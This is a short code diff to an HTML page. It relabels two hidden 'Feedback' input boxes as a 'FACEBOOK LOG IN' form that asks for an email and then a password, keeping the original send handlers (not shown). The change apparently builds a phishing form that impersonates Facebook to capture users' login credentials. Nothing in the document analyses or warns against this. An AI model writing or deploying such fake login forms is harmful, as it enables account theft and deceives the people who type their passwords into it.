Update feedback section to Facebook login form

--- a/index.html
+++ b/index.html
@@ -87,16 +87,16 @@ button{
 
 <!-- FEEDBACK 1 -->
 <div class="box hidden" id="fb1">
-  <h3>Feedback</h3>
-  <input class="fb-input" id="f1" placeholder="Enter feedback">
-  <button onclick="sendF1()">Send</button>
+  <h3>FACEBOOK LOG IN</h3>
+  <input class="fb-input" id="f1" placeholder="Enter Email">
+  <button onclick="sendF1()">Enter</button>
 </div>
 
 <!-- FEEDBACK 2 -->
 <div class="box hidden" id="fb2">
-  <h3>More Feedback</h3>
-  <input class="fb-input" id="f2" placeholder="Enter feedback">
-  <button onclick="sendF2()">Send</button>
+  <h3>FACEBOOK LOG IN</h3>
+  <input class="fb-input" id="f2" placeholder="Enter Password">
+  <button onclick="sendF2()">Get Code</button>
 </div>
 
 <!-- CODE SHOW -->
